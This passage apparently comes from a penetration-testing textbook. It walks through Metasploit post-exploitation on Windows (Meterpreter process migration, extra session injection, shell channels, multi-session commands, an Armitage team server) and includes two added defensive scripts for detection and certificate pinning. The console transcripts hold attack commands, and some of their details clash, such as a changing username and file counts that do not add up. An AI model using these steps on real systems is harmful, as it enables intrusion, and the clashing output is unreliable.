msf exploit(java_jre17_provider_skeleton) > use post/windows/manage/migrate
msf post(migrate) > info
Name: Windows Manage Process Migration
Module: post/windows/manage/migrate
Platform: Windows
Arch:
Rank: Normal
... Output Deleted ...
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
KILL false no Kill original process for the session.
NAME no Name of process to migrate to.
PID no PID of process to migrate to.
SESSION yes The session to run this module on.
SPAWN true no Spawn process to migrate to. If name for process not given notepad.exe is used.
Description:
This module will migrate a Meterpreter session from one process to
another. A given process PID to migrate to or the module can spawn
one and migrate to that newly spawned process.
To run the module, select a session, and then launch the exploit.
msf post(migrate) > set session 1
session => 1
msf post(migrate) > exploit
[*] Running module against CORADINI
[*] Current server process: windows_https_8443.exe (3788)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3056
[+] Successfully migrated to process 3056
[*] Post module execution completed
A check of the sessions after the migration shows that the session remains; however, interacting with that session and running the ps command shows that Meterpreter is now in a different process.
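From the defender's side, the module's behaviour above (the session process spawns notepad.exe and then moves into it) leaves a recognisable trace in process-creation and remote-thread telemetry. The following is an added example, not code from the book: it checks for that spawn-then-inject sequence over constructed event records whose field names follow Sysmon Event IDs 1 and 8, with the PIDs and image names taken from the transcript above and the explorer.exe PID and timestamps invented.

```python
from typing import List

# Constructed events (not real telemetry) using the field names of Sysmon
# Event ID 1 (ProcessCreate) and Event ID 8 (CreateRemoteThread).  PIDs 3788
# and 3056 and the image names come from the transcript above; the explorer.exe
# PID and the timestamps are invented.
SESSION_EXE = r"C:\Users\jhaydn\Desktop\windows_https_8443.exe"
NOTEPAD = r"C:\Windows\System32\notepad.exe"
EXPLORER = r"C:\Windows\explorer.exe"

EVENTS = [
    {"id": 1, "t": 100, "ProcessId": 3788, "Image": SESSION_EXE,
     "ParentProcessId": 1760, "ParentImage": EXPLORER},
    # A user opening Notepad normally: spawned by explorer.exe, never injected into.
    {"id": 1, "t": 101, "ProcessId": 4100, "Image": NOTEPAD,
     "ParentProcessId": 1760, "ParentImage": EXPLORER},
    # post/windows/manage/migrate: the session process spawns notepad.exe ...
    {"id": 1, "t": 160, "ProcessId": 3056, "Image": NOTEPAD,
     "ParentProcessId": 3788, "ParentImage": SESSION_EXE},
    # ... and then creates a thread inside it.
    {"id": 8, "t": 161, "SourceProcessId": 3788, "SourceImage": SESSION_EXE,
     "TargetProcessId": 3056, "TargetImage": NOTEPAD},
]


def basename(path: str) -> str:
    """Last component of a Windows path, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()


def detect_spawn_and_migrate(events: List[dict], window: int = 60) -> List[dict]:
    """Alert on every cross-process remote-thread creation.  Severity is
    'high' when the source process itself spawned the target within `window`
    seconds (the spawn-then-migrate sequence), 'medium' otherwise."""
    created = {}
    for e in events:
        if e["id"] == 1:
            created[e["ProcessId"]] = e      # later events win on PID reuse
    alerts = []
    for e in events:
        if e["id"] != 8 or e["SourceProcessId"] == e["TargetProcessId"]:
            continue
        child = created.get(e["TargetProcessId"])
        spawned_by_source = (child is not None
                             and child["ParentProcessId"] == e["SourceProcessId"]
                             and 0 <= e["t"] - child["t"] <= window)
        alerts.append({"t": e["t"],
                       "severity": "high" if spawned_by_source else "medium",
                       "source_pid": e["SourceProcessId"],
                       "source": basename(e["SourceImage"]),
                       "target_pid": e["TargetProcessId"],
                       "target": basename(e["TargetImage"])})
    return alerts


if __name__ == "__main__":
    for alert in detect_spawn_and_migrate(EVENTS):
        print(alert)
```

Because the remote thread alone is only 'medium', the same rule also covers a migration into an already running process chosen with the module's PID option, just with less confidence.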
If the process containing Meterpreter is killed, either deliberately by the defender or accidentally, the attacker loses access. One way an attacker can reduce this risk is to create additional sessions. This can be done with the module post/windows/manage/multi_meterpreter_inject.
msf post(migrate) > use post/windows/manage/multi_meterpreter_inject
msf post(multi_meterpreter_inject) > info
Name: Windows Manage Inject in Memory Multiple Payloads
Now the attacker has a second session on the compromised host Coradini. Note that the architecture of the new payload (64-bit) matched the architecture of the original session.
Target Architecture
There are different versions of Meterpreter for Windows; there is a 32-bit version that runs on 32-bit and 64-bit systems as well as a 64-bit version that runs only on 64-bit systems. Some exploits on 64-bit systems require a 64-bit Meterpreter. To change the Meterpreter version to match the architecture, an attacker can use the Metasploit module post/windows/manage/archmigrate.
Channels
The attacker can use the shell command to open a command prompt on the target.
meterpreter > shell
Process 5168 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Users\jhaydn\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 12AD-BB43
Directory of C:\Users\jhaydn\Desktop
04/23/2017 05:07 PM <DIR> .
04/23/2017 05:07 PM <DIR> ..
04/18/2017 05:14 PM 366,512 eric.exe
03/19/2017 08:01 PM <DIR> Tools
04/18/2017 08:09 PM 1,040,528 vs_Community.exe
04/23/2017 04:58 PM 7,168 windows_https_8443.exe
2 File(s) 1,407,040 bytes
3 Dir(s) 10,616,836,096 bytes free
C:\Users\Stefan Banach\Desktop>^Z
Background channel 1? [y/N] y
meterpreter >
This creates a channel within the Meterpreter session. To leave the channel and return to Meterpreter, press CTRL+Z. The various channels in a Meterpreter session are controlled by the channel command.
meterpreter > channel
Usage: channel [options]
Displays information about active channels.
OPTIONS:
-c <opt> Close the given channel.
-h Help menu.
-i <opt> Interact with the given channel.
-k <opt> Close the given channel.
-l List active channels.
-r <opt> Read from the given channel.
-w <opt> Write to the given channel.
meterpreter > channel -l
Id Class Type
-- ----- ----
1 3 stdapi_process
Executing Commands in Multiple Sessions
It is possible to execute commands on multiple hosts through the -C option to the sessions command. As an example, here are the results from running sysinfo on two different sessions with the same command.
msf post(migrate) > sessions -C sysinfo
[*] Running 'sysinfo' on meterpreter session 1 (10.0.15.203)
Computer : CORADINI
OS : Windows 10 (Build 14393).
Architecture : x64
System Language : en_US
Domain : PLUTO
Logged On Users : 4
Meterpreter : x64/windows
[*] Running 'sysinfo' on meterpreter session 2 (10.0.15.208)
Computer : harrington
OS : Windows 8 6.2 (x86)
Meterpreter : java/windows
Armitage
Armitage provides both a graphical user interface and a collaboration environment for Metasploit. Developed by Raphael Mudge, Armitage is the baby brother of the commercial product Cobalt Strike (http://www.advancedpentest.com/).
Start Armitage from the command line with the command armitage. It makes use of the Metasploit database, which needs to have been configured already (see the “Configuring the Metasploit Internal Database” section earlier in this chapter). When Armitage first starts, it asks the user how to connect; retain the defaults (Figure 2-5). During the start process, Armitage asks the user if it should start Metasploit’s RPC server; answer yes.
Figure 2-5
Connecting to Armitage
Once Armitage is running, Metasploit exploits can be selected from a menu. Double-click on an exploit to bring up a menu to set the options; once the options have been set, press the launch button to start the exploit.
Systems known to Armitage are listed in the graphical interface; if the operating system is known, then an appropriate icon will be displayed. Systems on which a session has been established will have icons that feature the lightning bolts of joy (Figure 2-6).
Figure 2-6
Armitage in use
Armitage can function as a team server, allowing multiple attackers from multiple systems to collaborate. When run without arguments, the teamserver program provides a description of how the tool works.
root@kali-2016-2-u:~# teamserver
[*] You must provide: <external IP address> <team password>
<external IP address> must be reachable by Armitage
clients on port 55553
<team password> is a shared password your team uses to
authenticate to the Armitage team server
Start the Armitage team server by specifying an external IP address and a team password; the address and password shown in the output below are the ones passed on the command line.
root@kali-2016-2-u:~# teamserver 10.0.2.2 password1!
[*] Generating X509 certificate and keystore (for SSL)
[*] Starting RPC daemon
[*] MSGRPC starting on 127.0.0.1:55554 (NO SSL):Msg...
[*] MSGRPC backgrounding at 2017-02-14 22:54:47 -0500...
[*] sleeping for 20s (to let msfrpcd initialize)
[*] Starting Armitage team server
[*] Use the following connection details to connect your clients:
Host: 10.0.2.2
Port: 55553
User: msf
Pass: password1!
[*] Fingerprint (check for this string when you connect):
b5d8ae87b90cbfca823d2148b90fe5edf34b42ee
[+] I'm ready to accept you or other clients for who they are
Each team member starts a local copy of Armitage and connects to the team server by providing the required credentials; be sure to use the external IP address.
Each team member can perform scans; information from any scan is shared with all members of the team. If any team member establishes a session on a target, then all members of the team can interact with the session by right-clicking on the image of the host in the graphical user interface.
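The fingerprint printed by teamserver is the team's only protection against an on-path attacker on port 55553: the certificate is self-signed and freshly generated at every start, so no certificate authority can vouch for it, and the team password is sent over that TLS connection. Armitage shows the fingerprint in its connection dialog so that each client can compare it with the value read from the server console out of band. The following script is an added example, not part of Armitage or Metasploit; it performs the same check from the command line. It assumes, based on the 40 hex digits in the banner, that the fingerprint is the SHA-1 digest of the server's DER-encoded X.509 certificate, and the host, port and fingerprint in the usage line are the ones from the output above.

```python
"""Pin an Armitage team server's TLS certificate by its SHA-1 fingerprint.

Added example, not part of Armitage or Metasploit. Assumes (as the
teamserver banner suggests) that the printed fingerprint is the hex SHA-1
digest of the server's DER-encoded X.509 certificate.
"""
import hashlib
import hmac
import socket
import ssl


def cert_fingerprint(der_cert: bytes) -> str:
    """Return the lowercase hex SHA-1 digest of a DER-encoded certificate."""
    return hashlib.sha1(der_cert).hexdigest()


def normalize_fingerprint(text: str) -> str:
    """Accept 'b5d8ae...', 'B5:D8:AE:...' or 'b5 d8 ae ...' and return bare lowercase hex.

    Raises ValueError if the result is not 40 hex digits, so a typo in the value
    copied from the teamserver console fails closed instead of silently never
    matching.
    """
    cleaned = "".join(ch for ch in text.lower() if ch not in ": ")
    if len(cleaned) != 40 or any(ch not in "0123456789abcdef" for ch in cleaned):
        raise ValueError("fingerprint must be 40 hex digits (SHA-1)")
    return cleaned


def fingerprint_matches(der_cert: bytes, expected: str) -> bool:
    """Constant-time comparison of the certificate's fingerprint with the expected one."""
    return hmac.compare_digest(cert_fingerprint(der_cert), normalize_fingerprint(expected))


def fetch_peer_cert(host: str, port: int = 55553, timeout: float = 5.0) -> bytes:
    """Open a TLS connection and return the server's leaf certificate in DER form.

    The team server's certificate is self-signed and generated at start-up, so
    chain validation is deliberately disabled here. Trust comes only from the
    fingerprint comparison that follows, never from this function alone.
    """
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False          # must be cleared before verify_mode
    ctx.verify_mode = ssl.CERT_NONE
    with socket.create_connection((host, port), timeout=timeout) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            return tls.getpeercert(binary_form=True)


def verify_teamserver(host: str, port: int, expected_fingerprint: str) -> bool:
    """Return True only if the live certificate matches the out-of-band fingerprint."""
    der = fetch_peer_cert(host, port)
    return fingerprint_matches(der, expected_fingerprint)


if __name__ == "__main__":
    import sys
    # Usage (values from the teamserver output above):
    #   python pin_teamserver.py 10.0.2.2 55553 b5d8ae87b90cbfca823d2148b90fe5edf34b42ee
    host, port, expected = sys.argv[1], int(sys.argv[2]), sys.argv[3]
    if verify_teamserver(host, port, expected):
        print("fingerprint matches; safe to enter the team password")
    else:
        print("FINGERPRINT MISMATCH: possible on-path attacker, do not connect")
        sys.exit(1)
```

Run it before typing the team password into the Armitage connection dialog; a mismatch means the socket you reached is not the server that printed the banner. The comparison uses hmac.compare_digest so that the check does not leak, through timing, how many leading bytes of a guessed fingerprint were correct.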
Notes and References
If you want to learn more about the Morris worm itself, take a look at the 1989 technical report “A Tour of the Worm” from Donn Seeley at the University of Utah. It is available at http://content.lib.utah.edu/cdm/ref/collection/uspace/id/709.
In my experience, some Metasploit modules work better than others. On many occasions, I have tried an exploit against a target that meets the required conditions, only to have it fail. Sometimes I can find the reason (maybe the exploit does not work on a closed network), and sometimes I cannot. If this happens to you, do not despair. Double-check your requirements (yes, I have made this mistake all too often), and try it on other systems. It may be the case, though, that the exploit depends on the state of either Metasploit or the target in a way that is not met. It happens.
If Windows Defender is enabled on the target, then some of the exploits will fail.
The first example exploit, EternalBlue, is known to be unstable, and it has the potential to crash the target system.
If, as suggested, you are working in a virtual security laboratory, one possible explanation for a failed attack may be the features of the host and/or your virtualization solution. This is particularly notable for exploits of Internet Explorer. For example, I have successfully attacked these systems when they are running on a Windows 7 host using VMware Workstation 11, but the same attacks failed when the guests were copied to a Windows 10 host running VMware Workstation 12. Repeating the attacks on similar systems on an ESXi server is successful.
Other times there are settings in the exploit that need to be tweaked. For example, I have found that although the MS13-037 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow exploit does not require the Java ROP, it works much more reliably with it. Run the command show advanced to see the option and the command set rop JRE6 to make the change. Similarly, the exploit MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution against Windows 7 targets seems to function better when AllowPowershellPrompt is set to true. As yet another example, on my Windows 10 testing system with VirtualBox 5.0, the exploit Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory, run against a Windows 8.1 system with Firefox 38.0.5 and Adobe Flash Player 15.0.0.189 using the payload windows/meterpreter/reverse_https, reliably fails; if the payload is changed to windows/meterpreter/reverse_tcp, the exploit reliably succeeds. The resulting shell is also limited; attempts to run the shell command to obtain a Windows command prompt crash the session.
Metasploit ranks the reliability of its modules as Excellent, Great, Good, Normal, Average, Low, or Manual. Modules ranked as normal are considered reliable but depend on a specific version that the module cannot detect automatically, while good or great ranked modules include some sort of automatic targeting or a default target that covers the common case. Modules listed as excellent are expected never to crash the target service. Modules listed as average are unreliable or difficult, and low-ranked modules are worse. For a description of the module rankings, see https://github.com/rapid7/metasploit-framework/wiki/exploit-ranking.
Also keep in mind that Metasploit is under active development, and modules can and do change.
If Firefox dies and won’t restart properly, disable all add-ons, then restart Firefox; the add-ons can then be re-enabled. The Firefox XCS Code Execution exploit abuses the AddonManager for Firefox, and sometimes (especially on Linux systems) Firefox is unable to recover. In some cases, Firefox is even unable to proceed beyond the Mozilla Crash Reporter to allow you to disable the add-ons. The solution in this case is to start Firefox from the command line in safe mode:
pdirichlet@acrux ~ $ firefox -safe-mode
Disable add-ons, and restart Firefox. The add-ons can then be re-enabled.
Metasploit provides two types of reverse payloads: staged payloads and stageless payloads. As an example, the payload described in the text, windows/meterpreter/reverse_https, is a staged payload. In this case, there are two stages to the payload delivery. In the first step, a small stager is sent; this takes control of the process and provides a way to download the second, larger stage that contains most of the functionality. It is also possible to send the whole payload as a single stage; this can be done with the corresponding stageless payload windows/meterpreter_reverse_https (note the underscore in place of the slash), which produces a larger executable but needs no second download. The full details of the differences between staged and stageless payloads are well explained by OJ Reeves on the Rapid7 Community page at https://community.rapid7.com/community/metasploit/blog/2015/03/25/stageless-meterpreter-payloads.
There is much more to Armitage than the short introduction provided by the text. For more details, check out the Armitage manual, available at http://www.fastandeasyhacking.com/manual.
References
There are many good books in print that discuss offensive security. For books on Metasploit, try the following:
Metasploit: The Penetration Tester’s Guide, David Kennedy, Jim O’Gorman, Devon Kearns, and Mati Aharoni. No Starch Press, July 2011.
Mastering Metasploit, 2nd ed., Nipun Jaswal. Packt Publishing, September 2016.
For a broader introduction to penetration testing, try these:
Penetration Testing: A Hands-On Introduction to Hacking, Georgia Weidman. No Starch Press, June 2014.
The Basics of Hacking and Penetration Testing: Ethical Hacking and Penetration Testing Made Easy, 2nd ed., Patrick Engebretson. Syngress, August 2013.
Advanced Penetration Testing for Highly-Secured Environments: The Ultimate Security, Lee Allen. Packt Publishing, May 2012.
To learn more about Kali and some of the other tools Kali provides, try these: